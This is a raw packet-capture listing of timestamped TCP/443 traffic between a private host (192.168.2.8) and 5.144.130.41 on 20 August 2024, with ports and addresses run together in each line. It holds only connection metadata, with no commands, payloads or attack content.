                                      Aug 20, 2024 18:39:59.993885994 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:59.993904114 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:59.993968964 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:59.993982077 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:59.994024992 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.009712934 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.009730101 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.009808064 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.009820938 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.009860992 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.016068935 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.016092062 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.016170979 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.016182899 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.016227007 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.017440081 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.017457008 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.017514944 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.017523050 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.017564058 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.061711073 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.061732054 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.061963081 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.062031984 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.062103033 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.062316895 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.062365055 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.062388897 CEST443623985.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:00.062412977 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.062450886 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:00.065011024 CEST62398443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.115221977 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.115243912 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.115350008 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.115367889 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.137058973 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.137082100 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.403158903 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.417866945 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.417885065 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.686639071 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.686831951 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.686933994 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.686983109 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.687015057 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.687031031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.687067032 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.687082052 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.688677073 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.688729048 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.688735008 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.688746929 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.688796997 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.713603973 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.763535023 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.763550997 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.810339928 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.860099077 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.860217094 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.870049953 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.870147943 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.870177031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.882659912 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.882697105 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.882729053 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.894895077 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.894910097 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.894970894 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.894996881 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.895039082 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.906744003 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.906765938 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.906826019 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.906846046 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.920691013 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.920717955 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.920747042 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.931893110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.931968927 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.931993008 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.932018995 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.932060003 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.942097902 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.942121983 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.942174911 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.942193985 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.954025984 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.954087973 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.954112053 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.965591908 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.965615034 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.965683937 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:07.965703011 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:07.965744019 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.033813000 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.033844948 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.033938885 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.033968925 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.039139032 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.039191961 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.039230108 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.049114943 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.049187899 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.049215078 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.049329996 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.049372911 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.058605909 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.445543051 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.445580006 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.447825909 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.447892904 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.447958946 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.447968006 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.448698997 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.448746920 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.448780060 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.451324940 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.451378107 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.451381922 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.451390028 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.451423883 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.452291965 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.452318907 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.452354908 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.452361107 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.454755068 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.454806089 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.454832077 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.456461906 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.456511974 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.456628084 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.458153963 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.458180904 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.458206892 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.458213091 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.458254099 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.458956003 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.459008932 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.459050894 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.459055901 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.463454008 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.463489056 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.463511944 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.463928938 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.463973045 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.463975906 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.463983059 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.464026928 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.489919901 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.489995003 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.490001917 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.490724087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.490753889 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.490773916 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.491981030 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.492027044 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.492057085 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.492072105 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.492108107 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.493480921 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.493505955 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.493547916 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.493554115 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.495811939 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.495839119 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.495862007 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.496454954 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.496503115 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.496510029 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.498197079 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.498230934 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.498254061 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.498260021 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.498301983 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.499454021 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.499475002 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.499526024 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.499531031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.500762939 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.500783920 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.500807047 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.502230883 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.502268076 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.502286911 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.502293110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.502329111 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.503654957 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.503778934 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.503823042 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.503829002 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.505037069 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.505069017 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.505090952 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.506350994 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.506388903 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.506408930 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.506414890 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.506459951 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.507474899 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.507565022 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.507610083 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.507616043 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.509434938 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.509501934 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.509507895 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.510004997 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.510056019 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.510061979 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.510097027 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.511826992 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.511856079 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.511892080 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.511898041 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.512545109 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.512589931 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.512595892 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.513696909 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.513741016 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.513746977 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.513834953 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.513876915 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.514944077 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.515033960 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.515070915 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.515077114 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.516166925 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.516195059 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.516222954 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.517445087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.517493963 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.517499924 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.517515898 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.517549038 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.518672943 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.518698931 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.518747091 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.518752098 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.519779921 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.519800901 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.519815922 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.520982981 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.521008015 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.521028042 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.521034002 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.521081924 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.522141933 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.522162914 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.522202969 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.522207975 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.523324013 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.523355007 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.523374081 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.524609089 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.524631023 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.524653912 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.524660110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.524698973 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.525726080 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.525791883 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.525830984 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.525849104 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.527051926 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.527087927 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.527091980 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.527985096 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.528022051 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.528043032 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.528048992 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.528079987 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.529259920 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.529313087 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.529349089 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.529355049 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.530437946 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.530466080 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.530486107 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.531589031 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.531615019 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.531640053 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.531646013 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.531687975 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.532776117 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.532816887 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.532851934 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.532856941 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.534897089 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.534939051 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.534945965 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.554927111 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.554953098 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.555012941 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.555023909 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.555067062 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.555340052 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.555433035 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.555478096 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.555483103 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.556638956 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.556684017 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.556730986 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.557614088 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.557657957 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.557692051 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.559652090 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.559694052 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.559700012 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.559740067 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.559771061 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.559777021 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.560087919 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.560173988 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.562832117 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.562889099 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.562896013 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.562935114 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.567384958 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.567440987 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.567476034 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.567481995 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.571849108 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.571913958 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.571922064 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.582495928 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.582530975 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.582576990 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.582585096 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.582622051 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.582650900 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.582679987 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.582721949 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.582726955 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.582758904 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.583359957 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.583524942 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.583549023 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.583574057 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.583580971 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.583605051 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.583625078 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.586512089 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.586535931 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.586550951 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.586586952 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.586592913 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.586627007 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:08.589391947 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.589512110 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:08.589570045 CEST62401443192.168.2.85.144.130.41
